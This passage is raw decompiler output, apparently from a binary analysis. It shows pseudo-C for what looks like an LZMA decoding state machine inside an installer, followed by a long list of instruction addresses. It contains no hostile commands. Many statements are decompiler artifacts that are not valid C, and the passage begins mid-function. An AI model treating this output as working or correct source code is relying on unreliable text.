												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                      0x00000000
                      0x004062eb
                      0x004062eb
                      0x004062ef
                      0x00406310
                      0x00406317
                      0x0040631d
                      0x00406323
                      0x00406335
                      0x0040633b
                      0x00406340
                      0x00000000
                      0x004062f1
                      0x004062f7
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x004066bb
                      0x004066bb
                      0x004066bb
                      0x004066c1
                      0x004066c7
                      0x004066cd
                      0x004066e7
                      0x004066ea
                      0x004066f0
                      0x004066fb
                      0x004066fd
                      0x004066cf
                      0x004066cf
                      0x004066de
                      0x004066e2
                      0x004066e2
                      0x00406707
                      0x00000000
                      0x00000000
                      0x00406709
                      0x0040670d
                      0x004068bc
                      0x004068d2
                      0x004068da
                      0x004068e1
                      0x004068e3
                      0x004068ea
                      0x004068ee
                      0x004068ee
                      0x00406719
                      0x00406720
                      0x00406728
                      0x0040672b
                      0x0040672e
                      0x0040672e
                      0x00406734
                      0x00406734
                      0x00405ed0
                      0x00405ed0
                      0x00405ed0
                      0x00405ed9
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x00000000
                      0x00405eea
                      0x00000000
                      0x00000000
                      0x00405ef3
                      0x00405ef6
                      0x00405ef9
                      0x00405efd
                      0x00000000
                      0x00000000
                      0x00405f03
                      0x00405f06
                      0x00405f08
                      0x00405f09
                      0x00405f0c
                      0x00405f0e
                      0x00405f0f
                      0x00405f11
                      0x00405f14
                      0x00405f19
                      0x00405f1e
                      0x00405f27
                      0x00405f3a
                      0x00405f3d
                      0x00405f49
                      0x00405f71
                      0x00405f73
                      0x00405f81
                      0x00405f81
                      0x00405f85
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405f75
                      0x00405f75
                      0x00405f78
                      0x00405f79
                      0x00405f79
                      0x00000000
                      0x00405f75
                      0x00405f4f
                      0x00405f54
                      0x00405f54
                      0x00405f5d
                      0x00405f65
                      0x00405f68
                      0x00000000
                      0x00405f6e
                      0x00405f6e
                      0x00000000
                      0x00405f6e
                      0x00000000
                      0x00405f8b
                      0x00405f8b
                      0x00405f8f
                      0x0040683b
                      0x00000000
                      0x0040683b
                      0x00405f98
                      0x00405fa8
                      0x00405fab
                      0x00405fae
                      0x00405fae
                      0x00405fae
                      0x00405fb1
                      0x00405fb5
                      0x00000000
                      0x00000000
                      0x00405fb7
                      0x00405fbd
                      0x00405fe7
                      0x00405fed
                      0x00405ff4
                      0x00000000
                      0x00405ff4
                      0x00405fc3
                      0x00405fc6
                      0x00405fcb
                      0x00405fcb
                      0x00405fd6
                      0x00405fde
                      0x00405fe1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406026
                      0x0040602c
                      0x0040602f
                      0x0040603c
                      0x00406044
                      0x00000000
                      0x00000000
                      0x00405ffb
                      0x00405ffb
                      0x00405fff
                      0x0040684a
                      0x00000000
                      0x0040684a
                      0x0040600b
                      0x00406016
                      0x00406016
                      0x00406016
                      0x00406019
                      0x0040601c
                      0x0040601f
                      0x00406024
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004066bb
                      0x004066bb
                      0x004066c1
                      0x004066c7
                      0x004066cd
                      0x004066e7
                      0x004066ea
                      0x004066f0
                      0x004066fb
                      0x004066fd
                      0x004066cf
                      0x004066cf
                      0x004066de
                      0x004066e2
                      0x004066e2
                      0x00406707
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040604c
                      0x0040604e
                      0x00406051
                      0x004060c2
                      0x004060c5
                      0x004060c8
                      0x004060cf
                      0x004060d9
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00406053
                      0x00406057
                      0x0040605a
                      0x0040605c
                      0x0040605f
                      0x00406062
                      0x00406064
                      0x00406067
                      0x00406069
                      0x0040606e
                      0x00406071
                      0x00406074
                      0x00406078
                      0x0040607f
                      0x00406082
                      0x00406089
                      0x0040608d
                      0x00406095
                      0x00406095
                      0x00406095
                      0x0040608f
                      0x0040608f
                      0x0040608f
                      0x00406084
                      0x00406084
                      0x00406084
                      0x00406099
                      0x0040609c
                      0x004060ba
                      0x004060bc
                      0x00000000
                      0x0040609e
                      0x0040609e
                      0x004060a1
                      0x004060a4
                      0x004060a7
                      0x004060a9
                      0x004060a9
                      0x004060a9
                      0x004060ac
                      0x004060af
                      0x004060b1
                      0x004060b2
                      0x004060b5
                      0x00000000
                      0x004060b5
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406355
                      0x00406359
                      0x0040637c
                      0x0040637f
                      0x00406382
                      0x0040638c
                      0x0040635b
                      0x0040635b
                      0x0040635e
                      0x00406361
                      0x00406364
                      0x00406371
                      0x00406374
                      0x00406374
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00000000
                      0x00406398
                      0x0040639c
                      0x00000000
                      0x00000000
                      0x004063a2
                      0x004063a6
                      0x00000000
                      0x00000000
                      0x004063ac
                      0x004063ae
                      0x004063b2
                      0x004063b2
                      0x004063b5
                      0x004063b9
                      0x00000000
                      0x00000000
                      0x00406409
                      0x0040640d
                      0x00406414
                      0x00406417
                      0x0040641a
                      0x00406424
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x004066b8
                      0x0040640f
                      0x00000000
                      0x00000000
                      0x00406430
                      0x00406434
                      0x0040643b
                      0x0040643e
                      0x00406441
                      0x00406436
                      0x00406436
                      0x00406436
                      0x00406444
                      0x00406447
                      0x0040644a
                      0x0040644a
                      0x0040644d
                      0x00406450
                      0x00406453
                      0x00406453
                      0x00406456
                      0x0040645d
                      0x00406462
                      0x00000000
                      0x00000000
                      0x004064f0
                      0x004064f0
                      0x004064f4
                      0x00406892
                      0x00000000
                      0x00406892
                      0x004064fa
                      0x004064fd
                      0x00406500
                      0x00406504
                      0x00406507
                      0x0040650d
                      0x0040650f
                      0x0040650f
                      0x0040650f
                      0x00406512
                      0x00406515
                      0x00000000
                      0x00000000
                      0x004060e5
                      0x004060e5
                      0x004060e9
                      0x00406856
